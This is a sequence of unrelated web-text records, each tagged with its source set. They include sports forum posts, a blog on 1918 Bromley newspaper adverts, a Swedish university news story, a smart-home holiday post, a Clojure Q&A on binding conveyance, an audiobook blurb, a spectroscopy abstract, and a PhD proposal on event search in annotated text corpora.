Because we all know that in the Zombie Apocalypse, people are the real monsters. And so are the zombies. And also the Jones Act.
|
{
"pile_set_name": "Pile-CC"
}
|
i absolutely love how involved russell is in the community. he seems to really love the seattle area and to understand that we havent had a real sports hero here in quite a while. stoked hes stepping up and filling that hole.
That's Max Browne, aka Peyton Manning clone Max Browne. I didn't even know about the Manning comparisons when I first saw him and within 5 seconds I thought "he throws and steps EXACTLY like Manning does."
Saw that happen on the local news. Pretty cool story. And the ceiling is very high for Browne. He's got a very good chance at a wonderful college and NFL career. Too bad it's not going to be as a Seahawk.
"The ultimate number is W's, and that’s what matters in Santa Clara. As such, Jed York does not own the 49ers; Russell Wilson does." - Paul Gutierrez
Seahawk Sailor wrote:Saw that happen on the local news. Pretty cool story. And the ceiling is very high for Browne. He's got a very good chance at a wonderful college and NFL career. Too bad it's not going to be as a Seahawk.
You never know...it could be...he's got at least 4 years to go in college and Russell is going to eventually need an heir apparent no matter how young he is now. I for one don't want to see Seattle scrambling to find a franchise QB when Wilson is done winning super bowls and finally hangs up those cleats.
“There’s no reason, with Mr. Allen and the fan base here and the stadium, that this can’t be a stable, long-term winning organization.” - John Schneider
Seahawk Sailor wrote:Saw that happen on the local news. Pretty cool story. And the ceiling is very high for Browne. He's got a very good chance at a wonderful college and NFL career. Too bad it's not going to be as a Seahawk.
You never know...it could be...he's got at least 4 years to go in college and Russell is going to eventually need an heir apparent no matter how young he is now. I for one don't want to see Seattle scrambling to find a franchise QB when Wilson is done winning super bowls and finally hangs up those cleats.
And do you really think that the Hawks are going to be in position to Draft a person of this caliber in four years? Never happen! I expect us to be Drafting at #25 or lower from now on!!! Well....I suppose that someone could give us their #1 for Flynn.
That struck me as funnier than hell....BUT....notice the difference in the size of their hands? Oh...My...God!!! I really hope this kid kicks ass @ SC, he seems to have the humility it takes to succeed
|
{
"pile_set_name": "Pile-CC"
}
|
Tag: Adverts
Would an advert like this, as featured in the Bromley & District Times in July 1918, made you go out and buy Cyder to quench your thirst on these warm summer days? According to Minchew’s Real Cyder & Perry, there is a difference between Cider and Cyder. Cyder is rarely made on a commercial scale, whereas Cider is. Cyder is made from a single pressing of vintage fruit, rather like “extra virgin” olive oil. Cider, the drink almost given to agricultural labourers well into living memory, was made from the cyder pulp being re-pressed at the rate of 10…
No sum can be too large! Another example of an advert, often seen in local newspapers, encouraging local people to invest ‘every shilling’ they could so that they could buy their town’s ‘own’ gun to help their boys on the Front line, by investing in National War Bonds and War Savings Certificates to help pay for the war. FIRE your Money at the Huns Join the throngs of patriotic investors who all this week have been hurrying to lend their money to their country. Draw out your savings and buy War Bonds. Back up…
Adverts like this one from the Bromley & District Time (31st May 1918, page 6) appeared in local newspapers advertising for woman to join the British Army in roles such as cooks, waitresses and clerks. The supreme test of British Womanhood comes now The British Army Urgently requires 5000 Women clerks You will be trained FREE and paid during training – and you enrol for the duration of the war in Queen Mary’s Army Auxiliary Corps
An advert which appeared in the Bromley & District Times on the 24th May 1918 (page 6), advertising for the women of Britain to help with home service during the war. Women of Britain Will you come and cook for the men who are defending you and your home? 7,000 Cooks and waitresses are wanted now for home service only with the Queen Mary’s Army Auxiliary Corps. Cooks and waitresses also required for service overseas. Fill in this form, then cut out the advert and send to Ministry of…
In 1918, the British government set out new laws introducing the rationing of certain food; Sugar, meat, flour, butter, margarine and milk, as a way of sharing food equally. However, as this advert shows from World Stores (who had branches at 50 East Street, Bromley and 41 High Street, Orpington), from the Bromley & District Times on 17th May 1918 (page 6), certain foods did not require a ration card to be purchased. NO RATION CARD REQUIRED for any of the the following:- (equal to Meat in food value) Spaghetti (in tomato…
Dame Clara Ellen Butt, DBE (1 February 1872 – 23 January 1936) was an English contralto. Her main career was as a recitalist and concert singer. Her voice, both powerful and deep, impressed contemporary composers such as Saint-Saens and Elgar; the latter composed a song-cycle with her in mind as soloist. Butt appeared in only two operatic productions, both of Gluck’s Orfeo ed Euridice. Later in her career she frequently appeared in recitals together with her husband, the baritone Kennerley Rumford. She made numerous recordings for the gramophone. Advert featured in the Bromley…
During World War 1 a Women Committee was set up as there was concern about girls canoodling with the soldiers, and soldiers corrupting local girls. Consequently women were encouraged to join the street patrols in particular areas where girls and men might ‘enjoy’ a little ***. The War Office gave permission for these patrols to take place outside military camps and were also very active in public parks and cinemas. It was the Women’s Patrol Committee who recommended that lights were not dimmed between films! This, at a time when…
How times have changed. I doubt very much that you would see an advert like this in the local newspaper today suggesting giving your son a new suit for Easter, but this is exactly what Isaac Walton and Co. promoted for Easter in 1918. At least the models looked very pleased with their new suits!
So if you were walking around the shops in 1918, these would have been the fashion statements on offer to you from top retailers such as Sainsbury’s – so elegant! Taken from the Bromley & District Times, 22nd March 1918
|
{
"pile_set_name": "Pile-CC"
}
|
In January 2019, the master’s programme in ABM (archives, libraries and museums) at Uppsala University held a panel discussion where teachers answered students’ questions. One group had read in the literature that it can be difficult to find information about race in old catalogues in archives, museums and libraries. They wondered what they should do in such situations.
Inga-Lill Aronsson, senior lecturer in museum and cultural heritage studies, answered. She first spoke about pedagogical aspects of meeting visitors in the ABM sector, and said that the students should search for the word in question.
– Then I said: “Let us take the controversial word”, and made the mistake of pronouncing the whole n-word. I was thinking in terms of classification and old catalogue systems.
She argues that the only way to deal with a dark cultural heritage is to look at what is in the old archives.
– We must put words, documents and research on the table and discuss them. To do that, you have to pronounce certain words.
“No right to use the word”
Afterwards, four students emailed the department. They considered that the word lacked relevance in the context and that Inga-Lill Aronsson had no right to use it since she is neither Black nor racialised.
– We were startled. It is an extremely loaded word, around which, in my view, there is a consensus that it is not okay to use. There were also visibly racialised people in the room. What we reacted to most was that none of the teachers reacted, one of the students tells Universitetsläraren.
Called to a meeting
The department opened a harassment investigation, in which Inga-Lill Aronsson was called to a meeting with the department management and the university’s equal-opportunities specialist.
– There was no understanding of the context; the meeting was about declaring me blameworthy. I then asked to be excused from upcoming teaching with the group, out of respect for the students’ feelings, she says.
Reine Rydén, deputy head of department, perceived the meeting as constructive. They went through the university’s regulations, explained that the department considered the choice of words inappropriate, and Inga-Lill Aronsson gave her view of the matter.
– The context was relevant. But it is possible to discuss the problem of sensitive words in old catalogues without pronouncing the words, he says.
Read also “An unclear line between consideration and self-censorship”.
FACTS / Freedom of expression and discrimination
According to the Instrument of Government, everyone is free to express thoughts, opinions and feelings in speech, writing, images or in other ways. Freedom of expression is, however, limited on a number of points. Freedom-of-expression offences can, for example, involve insult: making derogatory statements about someone, or behaving in a humiliating way towards another person with the intent to violate their self-esteem or dignity. Defamation is also prohibited, meaning that someone “points out someone else as criminal or blameworthy in their way of life, or otherwise provides information intended to expose them to the contempt of others.”
Incitement against an ethnic group means that someone “threatens or expresses contempt for an ethnic group or another such group of persons with allusion to race, skin colour, national or ethnic origin, religious belief, sexual orientation or transgender identity or expression.”
The Discrimination Act prohibits discrimination on the grounds of sex, transgender identity or expression, ethnicity, religion or other belief, disability, sexual orientation and age. It may be direct discrimination, where someone is disadvantaged by being treated worse than others in a comparable situation, or indirect discrimination, where someone is disadvantaged by the application of a provision, a criterion or a procedure. Discrimination can also take the form of harassment, that is, conduct that violates someone’s dignity and is connected to the grounds of discrimination. Sexual harassment is conduct of a sexual nature that violates someone’s dignity.
Employers and education providers are obliged to work preventively and proactively to counteract discrimination and otherwise promote equal rights and opportunities.
Sources: the Discrimination Act, the Instrument of Government and the Freedom of the Press Act
|
{
"pile_set_name": "OpenWebText2"
}
|
HOW TO GET YOUR SMART HOME READY FOR CHRISTMAS
HAVE A SAFE, SMART CHRISTMAS!
Spread Christmas Cheer with Z-Wave Devices
The weather is crisp, the stores are playing holiday tunes, and the smell of gingerbread and pine needles is in the air—it’s Christmas time! Whether you’re a fan of DIY smart home automation or have a professional system, one thing is definitely clear: having smart home devices makes the holidays much more enjoyable and effortless. Below, we cover our favorite ideas for putting your smart Z-Wave devices to work for the Christmas season.
The Décor
While your smart home system can’t put up the lights, wreath, and stockings for you, it can help manage the energy usage and on/off times for all your electric décor. Here’s how:
Start with a Smart Power Plug: Instead of plugging the Christmas lights directly into an outlet, connect them to a Z-Wave plug. The smart power plug takes whatever is connected to it and makes it controllable by your smart hub or professional system. So right from your phone, you can turn the décor off or on.
Automate It: As nice as it is to be able to turn the Christmas lights on or off from your phone, it’s even better to have a completely hands-off approach. The two most common ways to do this are with timers and motion sensors. Using your same Z-Wave plug, you can set the holiday décor to turn off and on at certain times throughout the day so that you don’t accidentally leave the outdoor decorations or Christmas tree on all night long. Smart motion sensors let you save even more energy by only turning on the interior decorations when there’s somebody there to enjoy them.
The Activities
Whether you’re planning a big holiday party or just spending time with family, you can use your smart home devices for a variety of fun Christmas activities. For example, if you have a Z-Wave alarm siren that chirps whenever motion is detected at night, use it to your advantage on Christmas Eve. Read a Christmas story with the kids upstairs while another family member moves around downstairs to trigger the motion sensors. The chirp of the smart alarm will get the kids all excited knowing that Santa is setting out the presents.
The Security
There is a significant boost in burglaries during the holiday season. Homes are left unoccupied while the residents travel to visit family, creating a perfect opportunity for thieves to help themselves to your valuables. If your Christmas plans include traveling away from home, make sure you’re not leaving your property defenseless. Check out our guide for tips on ensuring your property is safe without breaking the bank.
Of course, it’s not always thieves that you need to worry about when you’re leaving your home unattended. In the winter months, one broken pipe can spell disaster. If you want to avoid water damage, consider a water leak prevention system. Simply place water leak sensors and a water main shut-off valve (you can install it yourself with just a screwdriver) in your home. If a pipe bursts, the water heater leaks, or the tub overflows, the smart leak prevention system will automatically shut off the water to prevent the leak from spreading.
Want to give yourself the gift of comfort, security, and convenience this Christmas? Head over to our smart home devices store today and shop to your heart’s content! To keep up with the latest Z-Wave product news, follow us on Twitter and Facebook.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
binding & pmap interaction change?
There are several somewhat old blog posts out there advising caution when mixing dynamic variables, binding, and pmap, e.g. here, where we get the following code snippet:
user=> (def *foo* 5)
#'user/*foo*
user=> (defn adder
[param]
(+ *foo* param))
#'user/adder
user=> (binding [*foo* 10]
(doseq [v (pmap adder (repeat 3 5))]
(println v)))
10
10
10
nil
But that's not what happens when I run that code (changing the first line to (def ^:dynamic *foo* 5)). I get three 15s as output (using Clojure 1.4), just as you would naïvely expect—that is, with the change in the binding form seen by the function passed to pmap. Have the way thread-local bindings and pmap interact changed? I can't find this documented anywhere.
A:
Starting in 1.3, the set of dynamic bindings is sent to pmap along with the function. So as long as you mark the var ^:dynamic, this is no longer a problem. This feature is called Binding Conveyance and is included in the 1.3 changelog:
from: https://github.com/clojure/clojure/blob/1.3.x/changes.txt
Clojure APIs that pass work off to other threads (e.g. send, send-off, pmap, future) now convey the dynamic bindings of the calling thread:
(def ^:dynamic *num* 1)
(binding [*num* 2] (future (println *num*)))
;; prints "2", not "1"
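For completeness, here is a minimal sketch (assuming Clojure 1.3 or later) of conveyance applied to pmap itself, matching the setup in the question. One caveat worth noting: pmap is lazy, so it is safest to force the results with doall while the binding is still in effect.

```clojure
(def ^:dynamic *foo* 5)

(defn adder [param]
  (+ *foo* param))

;; The dynamic bindings of the calling thread are conveyed to the
;; threads pmap uses, so each adder call sees *foo* = 10, not the
;; root value 5. doall forces the lazy seq inside the binding scope.
(binding [*foo* 10]
  (doall (pmap adder (repeat 3 5))))
;; => (15 15 15)
```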
|
{
"pile_set_name": "StackExchange"
}
|
Snowballs By Fliss Chester AudioBook Download
Snowballs AudioBook Summary
Join old university friends Jenna, Max, Angus, Bertie, Hugo and Sally as they set off for a wintry week of fun, fondue and frivolity on the glamorous Val d’Argent.
On the agenda: flirting, drinking, dancing – and a bit of skiing along the way. But once they arrive, they are soon waylaid by secret passions, ominous oligarchs, chairlift shenanigans and the sort of social climbing that requires more effort and planning than a solo ascent of Mont Blanc.
Clip on your skis, dig out your salopettes and get ready for some fun on the slopes….
|
{
"pile_set_name": "Pile-CC"
}
|
Spectroscopic properties and location of the Tb(3+) and Eu(3+) energy levels in Y2O2S under high hydrostatic pressure.
In this contribution, an extensive spectroscopic study of Y2O2S doped with Eu(3+) and Tb(3+) is presented. Steady-state luminescence and luminescence excitation spectra as well as the time-resolved spectra and luminescence kinetics were obtained at high hydrostatic pressures up to 240 kbar. It was found that pressure quenches the luminescence from the (5)D3 excited state of Tb(3+) and recovers additional luminescence related to transitions from the (5)D3 state of Eu(3+). These effects are related to the pressure-induced increases in the energies of the ground electronic manifold 4f(n) of Eu(3+) and Tb(3+) ions with respect to the band edges. Analysis of the emission and excitation spectra allowed the estimation of the energies of the ground states of all lanthanide (Ln) ions (Ln(3+) and Ln(2+)) with respect to the valence and conduction bands edges of the Y2O2S host. The bandgap energy and difference between energies of the ground states of Ln(2+) and Ln(3+) have been calculated as functions of pressure. The experimental high-pressure spectroscopy results allow the calculation of the absolute values (calculated with respect to the vacuum level) of the energies and pressure-induced shifts of the conduction and valence band edges and the ground states of Ln(3+) and Ln(2+) ions in Y2O2S.
---
abstract: 'In this article, I present the questions that I seek to answer in my PhD research. I propose to analyze natural language text with the help of semantic annotations and to mine important events for navigating large text corpora. Semantic annotations such as named entities, geographic locations, and temporal expressions can help us mine events from the given corpora. These events in turn provide us with useful means to discover the knowledge locked inside these collections. I pose three problems that can help unlock this knowledge vault in semantically annotated text corpora: *i.* identifying important events; *ii.* semantic search; and *iii.* event analytics.'
author:
- |
Dhruv Gupta\
\
\
subtitle: 'Detecting Events in Semantically Annotated Corpora for Search & Analytics'
title: Event Search and Analytics
---
Introduction
============
Information retrieval systems have largely relied on word statistics in text corpora to satisfy the information needs of users by retrieving documents with high relevance for a given keyword query. In my PhD research I hypothesize that these information needs can be satisfied to a greater extent by using *events* as a means of navigating text corpora. An event in our context is an act performed by certain actor(s) at a specific location during a specific time interval. An example would be: *Usain Bolt won the gold medal at the 2008 Summer Olympics in Beijing*. With the availability of annotators that can provide us with accurate semantic annotations in the form of named entities, geographic locations, and temporal expressions, we can leverage the growing number of knowledge resources such as Wikipedia [@wiki] and ontologies such as Freebase [@freebase] to understand natural language text and mine important events. Formally, the central hypothesis can be stated as follows:
As a toy example, consider the following text snippet [^1] with demonstrative semantic annotations in Figure \[fig:text\]:
In the text snippet (Figure \[fig:text\]), we obtain a named entity whose mention has been identified and disambiguated to point to an external knowledge source. Also identified is a geographical location, which is disambiguated and resolved to its geographical coordinates. Likewise, the temporal expression has been resolved to a time range. Having these semantic annotations, we can now devise algorithms that deduce that the event is that of Usain Bolt winning an Olympic competition in Beijing, China.
The goal of the proposed research is to leverage these semantic annotations for mining important events and to use them for navigating text corpora. The research will find application in many domains of research such as the *digital humanities*, in which social scientists are interested in computational history over large digital-born text collections. Anthropologists are interested in cultural and linguistic shifts that occur in such collections. Collectively, this allows *computational culturomics* [@culturomics] on corpora to study cultural trends. Events can also be used to link information in multiple and diverse text collections. In short, important events provide a way to create a gist of semantically annotated corpora, which otherwise is not possible through manual human effort.
**Outline**. The article consists of:
- a literature survey (Section \[sec:background\]);
- an overview of the research problems (Section \[sec:problem\]);
- available corpora, test sources and evaluation measures for research (Section \[sec:evaluation\]);
- discussion of few open technical problems (Section \[sec:discussion\]).
Related Work
============
\[sec:background\]
In this section I discuss the progress already made in the area of analyzing different semantic annotations in isolation as well as in conjunction for some of the problems proposed.
**Temporal Information Retrieval and Extraction**. Researchers have considered only temporal annotations in text corpora to improve retrieval effectiveness by analyzing the time sensitivity of keyword queries and incorporating the time dimension in retrieval models. Some methods of analysis of time-sensitive queries rely on publication dates of documents [@diaz_profile; @nattiya_2010], while others also look at the temporal expressions in document contents [@dhruv_2014]. Several works also take into account the time dimension for re-ranking documents [@klaus_2010] and diversifying them along time [@klaus_2013; @nattiya_2014]. One of the seminal works in extracting temporal events was by Ling and Weld [@ling_tie]. They outline a probabilistic model to solve the problem of extracting relations from text with temporal constraints.
**Important Events in Annotated Corpora**. Among the most important seminal works in identifying existing and emerging events were the various tasks in *Topic Detection and Tracking* (TDT) [@tdt_book]. The TDT program aimed to “search, organize and structure” broadcast news media from multiple sources. The five tasks laid within the ambit of TDT were topic tracking, link detection, topic detection, first story detection, and story segmentation. The topic tracking task required building a system to detect *on topic stories* in an evaluation corpus after being trained on a set of *on topic* stories. The link detection task involved answering a boolean query as to whether two given *stories* are related by a common topic. The topic detection task comprised declaring new *topics* from incoming *stories* which had not been presented to the system. First story detection was another boolean decision task: determining whether a given *story* is a seed story (first story) that creates a new *topic* cluster. The story segmentation task required segmenting an incoming stream of text into *stories*.
Focusing specifically on extracting and summarizing events in the future, Jatowt and Yeung [@adam_cikm11] present a model-based clustering algorithm. The clustering considers both textual and temporal similarities. For computing temporal similarity, the authors model time as a probability distribution, utilizing different families of distributions based on whether it is a singular time point, a starting date, or an ending date. The similarity is then computed using KL-divergence.
Radinsky et al. [@kira_jair] present an algorithm, *Pundit*, which, based on past events in text, is able to predict a future event given a query to the system. The events are represented by multidimensional attributes such as time, geographic location, and participating entities. The algorithm derives these events from an external text collection and builds an *abstraction tree*, which results from hierarchical agglomerative clustering. In order to predict the future, *Pundit* is trained to select the most similar cluster from the *abstraction tree* and produce an event representation.
The work by Yeung and Jatowt [@yeung_cikm11] tackles the problem of analyzing historical events in multiple large document collections. They utilize *latent Dirichlet allocation* to identify *topic* distributions along time. Thereafter they perform analytics to answer questions such as: *i.* significant years and topics; *ii.* triggers that caused remembrance of the past; and *iii.* the historical similarity of countries.
Most recently, Abujabal and Berberich [@mppf] present a system which identifies important events in text collections by counting frequent itemsets of sentences containing named entities and temporal expressions. For evaluation they resort to *Wikipedia’s* event directory as a ground truth.
**Semantic Search**. Summarizing text collections in a timeline visualization is a natural choice. Swan and Allan [@swan_timeline] present an approach for producing a timeline that depicts the most important topics and events, closely modeled on the *Topic Detection and Tracking* task. The algorithm analyzes features based on named entities and noun phrases. The analysis involves construction of a $2 \times 2$ contingency table on the presence or absence of features, and subsequent measurement of the $\chi^2$ statistic to assess the significance of co-occurrence of a pair of features.
The seminal work by Baeza-Yates [@yates_future] proposed a *future retrieval* (FR) system. The FR system considers both text and temporal expressions to identify future events that might be relevant to an input query. Baeza-Yates outlined the components of a FR system as an *information extraction* (IE) module, an *information retrieval* (IR) module, and a *text mining* (TM) module. The IE module would act as a temporal annotator, identifying temporal expressions and normalizing them. The IR module is designed to incorporate the time dimension in an index, thus retrieving documents by text and time similarity. The TM module would identify the most relevant topics given a time period. He presented a retrieval model in which each document consists of multiple temporal events. A temporal event consists of a time segment and its associated likelihood of occurring. The score of a document is thus obtained from its textual similarity and the maximum likelihood over all the temporal events in that document.
Bast and Buchhold [@bast_index] outline a joint index structure over ontologies and text, which allows for fast semantic search and provides context-sensitive auto-complete suggestions.
Events as a means of searching document collections have also been explored by Strötgen and Gertz [@jannik_event]. Events were modeled by the geographic location and time of their occurrence. For temporal queries expressed in simple natural language, they outline an extended Backus-Naur form (EBNF) language that incorporates time intervals with standard boolean operations. Geographical queries are also modeled as an EBNF language; however, the input for them is a minimum bounding rectangle (MBR). Using this multidimensional querying model, the user is able to visualize search results in the form of events, which are additionally represented on a map.
Giving special attention to geographical information retrieval, Samet et al. [@samet_news] present a system, *NewsStand*, that is able to resolve and pinpoint a news article based on the geographic information present in its content. They discuss various methods for toponym resolution, which is in essence disambiguating a geographic location based on its surface form in the news content. The system involves a streaming clustering algorithm that can keep track of emerging news in new locations and present them in a map-based interface.
| **Event**    | $c_1$ | $c_2$ | $c_3$ |
|--------------|-------|-------|-------|
| **Words**    | micheal, phelps, bejing, china, tibet | london, usain, bolt, england, badminton | rio, brazil, copacabana, deodoro, maracanã |
| **Time**     | $[08-08-2008, 24-08-2008]$ | $[27-07-2012, 12-08-2012]$ | $[05-08-2016, 21-08-2016]$ |
| **Location** | $\langle Beijing, China \rangle$ | $\langle London, England \rangle$ | $\langle Rio de Janeiro, Brazil \rangle$ |
| **Entities** | $\langle China \rangle$, $\langle Micheal\_Phelps \rangle$ | $\langle England \rangle$, $\langle Badminton \rangle$ | $\langle Brazil \rangle$, $\langle Copacabana \rangle$ |

*Example set of mined events $\mathcal{C}$ for the keyword query `summer olympics`* (Figure \[fig:event\]).
**Event Analytics**. By disambiguating and linking named entities to ontologies, Hoffart et al. [@aesthetics; @stics] provide a framework for semantic search and for performing analytics on entities. They provide features for giving auto-complete suggestions in the form of similar entities for an input named entity. In [@aesthetics] they provide analytics that leverage accurate entity counts and provide entity co-occurrence statistics, which are helpful in analyzing semantically similar named entities.
Research Objectives
===================
\[sec:problem\] Given the text corpora with semantic annotations, I describe three important research problems in this section: *i.* identifying important events; *ii.* using identified events for improving retrieval effectiveness; and *iii.* using identified events for analytics.
Notation
--------
Let us consider multiple corpora for the purpose of analysis. This allows us to capture frequently occurring events as well as link similar events across corpora. Given corpora $$D = \bigcup_{k=1}^{N} D_k,$$ where each document $d \in D$ consists of word sequences $x$ at an appropriate granularity (e.g., paragraph or sentence): $$d = \bigcup_{i=1}^{n} x_i.$$ Further, each $x \in d$ contains semantic annotations in the form of *i.* named entities ($\mathcal{E}$), *ii.* a geographical location ($g$), and *iii.* temporal expressions ($t$). Additionally, $x$ also consists of a bag of words $\mathcal{W}$ drawn from a vocabulary $\mathcal{V}$. Formally, this is represented as: $$x = \langle \mathcal{E}, g, t, \mathcal{W} \rangle$$
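As a concrete, purely illustrative encoding of the annotated unit $x = \langle \mathcal{E}, g, t, \mathcal{W} \rangle$, the following Python sketch shows one way such units could be represented in code; all field and value names here are assumptions for illustration, not part of any existing system:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class AnnotatedUnit:
    """One unit x = <E, g, t, W> at sentence or paragraph granularity."""
    entities: frozenset   # named entities E, linked to a knowledge base
    geo: tuple            # geographical location g as (latitude, longitude)
    time: tuple           # temporal expression t normalized to (begin, end)
    words: frozenset      # bag of words W drawn from the vocabulary V

# the toy example from the introduction, encoded as one annotated unit
x = AnnotatedUnit(
    entities=frozenset({"Usain_Bolt", "China"}),
    geo=(39.9, 116.4),            # Beijing
    time=(2008, 2008),
    words=frozenset({"gold", "medal", "olympics"}),
)
```

Making the dataclass frozen keeps units hashable, so they can later serve as members of sets when grouping units into candidate events.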
Problem Definition
------------------
The objective is to design a family of algorithms: $$\textsc{Event*}(X,Q,\alpha)$$
where $X = \bigcup x$, $Q$ represents an input query, and $\alpha \in \mathds{R}^m$ is a set of parameters.
The input query $Q$ can be a combination of following input components: *i.* keyword query $q$, *ii.* time $q_{time}$, *iii.* geographical location $q_{geo}$, and *iv.* named entity $q_{entity}$.
Given the input, we need to design the algorithms $\textsc{Event*}$ according to the different problems. We discuss the design objectives for the three different purposes in this section.
**Identifying Important Events**. *Events* are the proposed building blocks for further text analysis. An *event* in our context is defined to be an activity or act involving named entities that happens at a specific geographical location, anchored to a specific time interval. Mathematically, given a multidimensional query: $$Q = \langle q, q_{time}, q_{geo}, q_{entity} \rangle,$$ and a subset of highly relevant documents $R \subseteq D$, the algorithm for this purpose, $\textsc{EventDetect}$, should produce a set of ordered events: $$\mathcal{C} = \{ c_1, c_2, \ldots, c_k \},$$
where, $c = \langle \mathcal{E}, g, t, \mathcal{W} \rangle$. The event $c$ is hence described by the participating named entities $\mathcal{E}$, its location $g$, its time of occurrence $t$, and frequently occurring contextual terms around these semantic annotations $\mathcal{W}$. This requires proposing a probability mass function, $P(\mathcal{C}, R)$, using which we can impose a total order on $\mathcal{C}$.
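A deliberately crude sketch of what an $\textsc{EventDetect}$ algorithm might do: here, candidate events are formed by grouping annotated units on their (location, time) pair, and raw support counts stand in for the probability mass function $P(\mathcal{C}, R)$. This is an illustrative assumption, not the algorithm the dissertation would actually develop:

```python
from collections import defaultdict

def event_detect(units):
    """Group units by (geo, time), pool entities/words, rank by support."""
    groups = defaultdict(lambda: {"entities": set(), "words": set(), "support": 0})
    for u in units:
        g = groups[(u["geo"], u["time"])]
        g["entities"] |= set(u["entities"])
        g["words"] |= set(u["words"])
        g["support"] += 1
    events = [{"geo": geo, "time": time, **v}
              for (geo, time), v in groups.items()]
    # impose a total order on C: most frequently supported events first
    return sorted(events, key=lambda c: -c["support"])

units = [
    {"geo": "Beijing", "time": "2008", "entities": ["Usain_Bolt"], "words": ["gold"]},
    {"geo": "Beijing", "time": "2008", "entities": ["China"], "words": ["medal"]},
    {"geo": "London", "time": "2012", "entities": ["Usain_Bolt"], "words": ["sprint"]},
]
events = event_detect(units)
```

Each returned event matches the structure $c = \langle \mathcal{E}, g, t, \mathcal{W} \rangle$, with the support count as a placeholder score.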
As an example consider the keyword-only query `summer olympics` to the processed corpora of news articles. The designed algorithm shall then identify the important events as in Figure \[fig:event\].
**Diversifying and Summarizing Search Results** are retrieval tasks that try to address the information need underlying an ambiguous query at different levels of textual granularity. Each task tries to maximize the coverage of different information needs underlying the given ambiguous query. As information intents, we propose to use the mined set of *events*. Accomplishing these tasks would allow for automatic creation of *event timelines* or *entity biographies*. We briefly discuss an intuition of achieving the same.
When diversifying search results, we would like to present users with *documents* such that the user finds *at least* one document that satisfies her information intent. For this we need to devise an algorithm $\textsc{EventDiverse}$ which takes as input $Q$ and $R \subseteq D$. As output, it returns a set of documents $S \subseteq R$ that covers all events in $\mathcal{C}$.
Summarizing search results would require us to construct an algorithm $\textsc{EventSummary}$ to piece together *sentences* $\hat{S} = \bigcup x$, such that the text summary covers all events in $\mathcal{C}$.
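One plausible, hypothetical realization of $\textsc{EventDiverse}$ is greedy set cover: repeatedly pick the document that covers the most still-uncovered events until all of $\mathcal{C}$ is covered. The document-to-event mapping below is invented for illustration:

```python
def event_diverse(docs, events):
    """Greedy cover: select documents until every mined event is covered."""
    uncovered, selected = set(events), []
    while uncovered:
        best = max(docs, key=lambda d: len(uncovered & docs[d]))
        if not uncovered & docs[best]:
            break  # the remaining events appear in no document
        selected.append(best)
        uncovered -= docs[best]
    return selected

# invented mapping from documents in R to the events of C they mention
docs = {
    "d1": {"beijing-2008", "london-2012"},
    "d2": {"rio-2016"},
    "d3": {"london-2012"},
}
picked = event_diverse(docs, {"beijing-2008", "london-2012", "rio-2016"})
```

The same greedy skeleton could serve $\textsc{EventSummary}$ by selecting sentences instead of documents.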
**Semantic Search and Analytics**. The mined set of *events* can further be utilized for search and analytics. For this purpose we can exploit the inherent hierarchy in the semantic annotations. For example, a given year can be broken down into different months and subsequently into the days of those months. Similarly, we can utilize the *type hierarchies* of named entities, in which specific entity types are subtypes of more general ones. This can jointly be modeled using the concept of a *data cube* [@han_dm], as shown in Figure \[fig:data\_cube\].
Formally, given a query $Q$, the objective would be to first model the mined set of events as a *data cube* and subsequently provide *data cube operations* [@han_dm]:
- roll ($\bigcirc$),
- slice ($\ominus$),
- dice ($\oplus$),
- drill up ($\bigtriangleup$),
- drill down ($\bigtriangledown$).
![Example data cube based on set of events $\mathcal{C}$[]{data-label="fig:data_cube"}](cube.pdf)
![Example data cube operations for the query `all races won during 2008 by usain bolt in china` []{data-label="fig:cube_opr"}](cubeopr.pdf)
As a concrete example, consider the query `all races won during 2008 by usain bolt in china`. To produce an appropriate result, the sequence of operations would be: first a slice on the queried entity; second a dice on the queried location; and finally a drill up to the year granularity (see Figure \[fig:cube\_opr\]).
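The slice, dice, and drill-up operations for this example query can be sketched in pure Python over a toy cube; the cell keys, counts, and granularities below are all illustrative assumptions rather than real data:

```python
from collections import defaultdict

# toy cube: one cell per (entity, location, month), holding a race-win count
cube = {
    ("Usain_Bolt", "China", "2008-08"): 3,
    ("Usain_Bolt", "China", "2008-09"): 1,
    ("Usain_Bolt", "England", "2012-08"): 3,
    ("Michael_Phelps", "China", "2008-08"): 8,
}

def slice_(cube, dim, value):
    """Fix one dimension to a single value."""
    return {k: v for k, v in cube.items() if k[dim] == value}

def dice(cube, dim, values):
    """Restrict one dimension to a set of values."""
    return {k: v for k, v in cube.items() if k[dim] in values}

def drill_up_to_year(cube):
    """Aggregate the month dimension up to years."""
    out = defaultdict(int)
    for (entity, location, month), n in cube.items():
        out[(entity, location, month[:4])] += n
    return dict(out)

# slice on the entity, dice on the location, drill up to the year
result = drill_up_to_year(dice(slice_(cube, 0, "Usain_Bolt"), 1, {"China"}))
```

The composed call mirrors the operation sequence described above, leaving a single aggregated cell for 2008.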
Data
====
**Corpora**. There are several readily available massive data sets, such as those from news corporations: the *New York Times* [@nyt] and *English Gigaword* [@gigaword]. These corpora have the benefit of coming with reliable publication dates and grammatically well-formed text. On a larger scale are Web collections such as *ClueWeb’09* [@clueweb09]/’12 [@clueweb12], which are not always accompanied by reliable creation dates and contain many ill-formed documents.
**Semantic Annotations**. The text corpora next need to be annotated for text mining. I explain how to obtain the different semantic annotations in the following paragraphs.
**Named Entities**. For disambiguating and linking named entities in text to an external knowledge source such as *Wikipedia* [@wiki] or an ontology such as YAGO [@yago] or Freebase [@freebase], I use the AIDA system [@aida]. The AIDA system performs named entity disambiguation and linking by leveraging contexts extracted from ontologies such as YAGO. For Web collections such as ClueWeb’09/’12, the entity disambiguation and linking has been released as *facc1: Freebase annotation of ClueWeb Corpora* [@facc].
**Geographical Locations** can be obtained by utilizing *geographic* named entities, such as those known to be cities, countries, or continents. Geographical relations stored in an ontology can be used to resolve these locations to their geographical coordinates. Having obtained a set of coordinates, we can subsequently construct a geographical representation, such as a *minimum bounding rectangle*, over the coordinates.
**Temporal Expressions**, both implicit and explicit, can be extracted and normalized from text by using *temporal taggers* such as HeidelTime [@heideltime] or SUTime [@sutime].
Evaluation
==========
\[sec:evaluation\]
To test our approach we need to construct query sets in which each query is associated with an event description, along with the participating named entities, the geographical location where the event took place, and the relevant time interval. I describe a tentative approach to achieve this here.
**Test Data**. To evaluate the correctness of the various algorithms, I plan to use reliable encyclopedic resources on the Web such as *Wikipedia* [@wiki] or other curated knowledge sources. For an objective evaluation, I propose the following different sources depending on the algorithm under evaluation.
- Identify important events
- Events in a particular year/decade etc. pages available on *Wikipedia* [@wiki_year].
